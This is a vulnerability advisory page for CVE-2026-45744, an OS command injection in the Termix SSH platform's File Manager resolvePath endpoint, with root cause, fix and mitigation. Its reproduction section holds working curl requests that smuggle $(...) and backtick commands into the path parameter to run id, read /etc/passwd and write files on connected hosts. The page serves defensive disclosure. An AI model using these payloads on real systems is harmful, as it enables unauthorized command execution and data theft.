CVE-2026-45744
Description
Termix versions prior to 2.3.2 are vulnerable to OS command injection via the File Manager's resolvePath endpoint, allowing authenticated users to execute arbitrary commands on connected hosts.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Termix versions prior to 2.3.2 are vulnerable to OS command injection via the File Manager's resolvePath endpoint, allowing authenticated users to execute arbitrary commands on connected hosts.
Vulnerability
Termix versions prior to 2.3.2 contain an OS command injection vulnerability in the GET /ssh/file_manager/ssh/resolvePath endpoint. This endpoint incorrectly escapes double quotes when constructing shell commands, failing to prevent command substitution via $(...) or backticks. The vulnerability exists in src/backend/ssh/file-manager.ts [1].
Exploitation
An attacker must be authenticated to Termix and have an active File Manager SSH session. By sending a specially crafted request to the resolvePath endpoint with malicious input in the path query parameter, the attacker can achieve command execution on the remote SSH host connected through Termix [1].
Impact
Successful exploitation allows any authenticated user with an active File Manager SSH session to execute arbitrary commands on the connected remote host. This can lead to a compromise of the remote host with the privileges of the user running Termix on that host.
Mitigation
Termix version 2.3.2 addresses this vulnerability. Users should update to version 2.3.2 or later. No workarounds are mentioned in the available references [2].
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2(expand)+ 1 more
- (no CPE)
- (no CPE)range: <2.3.2
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The file manager endpoint incorrectly uses double-quote escaping for shell command construction, allowing command substitution."
Attack vector
An authenticated user with an active File Manager SSH session can exploit this vulnerability. By sending a crafted path query parameter to the GET /ssh/file_manager/ssh/resolvePath endpoint, an attacker can inject arbitrary commands. These commands are then executed on the connected remote host via an SSH connection. The vulnerability leverages the fact that double-quoted strings in POSIX shells still interpret $(...) and backtick command substitutions [ref_id=1].
Affected code
The vulnerability exists in the GET /ssh/file_manager/ssh/resolvePath endpoint, specifically within the file src/backend/ssh/file-manager.ts. The code constructs a shell command using `echo "${escapedPath}"` where `escapedPath` is derived from the user-supplied `rawPath` query parameter [ref_id=1].
What the fix does
The fix replaces the vulnerable double-quote escaping with single-quote escaping, which prevents shell metacharacter interpretation. This aligns with the escaping method used in other endpoints within the same file. Alternatively, the advisory suggests resolving paths via SFTP's realpath() function to avoid shell execution altogether [ref_id=1].
Preconditions
- authThe attacker must be an authenticated user within Termix.
- configA target SSH host must be added to Termix.
- inputThe attacker must establish an active File Manager SSH session.
Reproduction
# PoC Prerequisites
A running Termix instance (tested on v2.1.0 Docker image) Any valid Termix user account A target SSH host added to Termix
Exploitation After logging in and establishing a File Manager SSH session, the following requests demonstrate arbitrary command execution on the remote SSH host:
# Authenticate and store session cookie curl -s -c cookies.txt -X POST http://<TERMIX_HOST>:30001/users/login \ -H "Content-Type: application/json" \ -d '{"username":"<USER>","password":"<PASS>"}'
# Open a File Manager SSH connection (returns/uses a sessionId) curl -s -b cookies.txt -X POST http://<TERMIX_HOST>:30004/ssh/file_manager/ssh/connect \ -H "Content-Type: application/json" \ -d '{"sessionId":"poc-session","hostId":1,"ip":"<SSH_HOST>","port":22,"username":"<SSH_USER>","password":"<SSH_PASS>","authType":"password"}'
# PoC 1 — Run 'id' via $() substitution curl -s -b cookies.txt \ "http://<TERMIX_HOST>:30004/ssh/file_manager/ssh/resolvePath?sessionId=poc-session&path=\$(id)"
# PoC 2 — Run 'whoami' via backtick substitution curl -s -b cookies.txt \ "http://<TERMIX_HOST>:30004/ssh/file_manager/ssh/resolvePath?sessionId=poc-session&path=%60whoami%60"
# PoC 3 — Read /etc/passwd curl -s -b cookies.txt \ "http://<TERMIX_HOST>:30004/ssh/file_manager/ssh/resolvePath?sessionId=poc-session&path=\$(cat%20/etc/passwd)"
# PoC 4 — Write to filesystem (proves full RCE, not just read) curl -s -b cookies.txt \ "http://<TERMIX_HOST>:30004/ssh/file_manager/ssh/resolvePath?sessionId=poc-session&path=\$(echo%20HACKED%20>%20/tmp/pwned.txt%20%26%26%20cat%20/tmp/pwned.txt)"
Output Tested against Termix v2.1.0 Docker image with an Alpine-based SSH target: PoC 1 — $(id): {"resolvedPath":"uid=1000(testuser) gid=1000(users) groups=1000(users)"} PoC 2 — whoami: {"resolvedPath":"testuser"} PoC 3 — $(cat /etc/passwd): {"resolvedPath":"root:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\n...testuser:x:1000:1000::/config:/bin/bash"} PoC 4 — $(echo HACKED > /tmp/pwned.txt && cat /tmp/pwned.txt): {"resolvedPath":"HACKED"}
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- github.com/Termix-SSH/Termix/security/advisories/GHSA-37f4-wq95-pg33nvdExploitMitigationVendor Advisory
- github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tagnvdProductRelease Notes
News mentions
1- Termix SSH Platform: Seven Critical and High Vulnerabilities Disclosed TogetherVypr Intelligence · Jun 5, 2026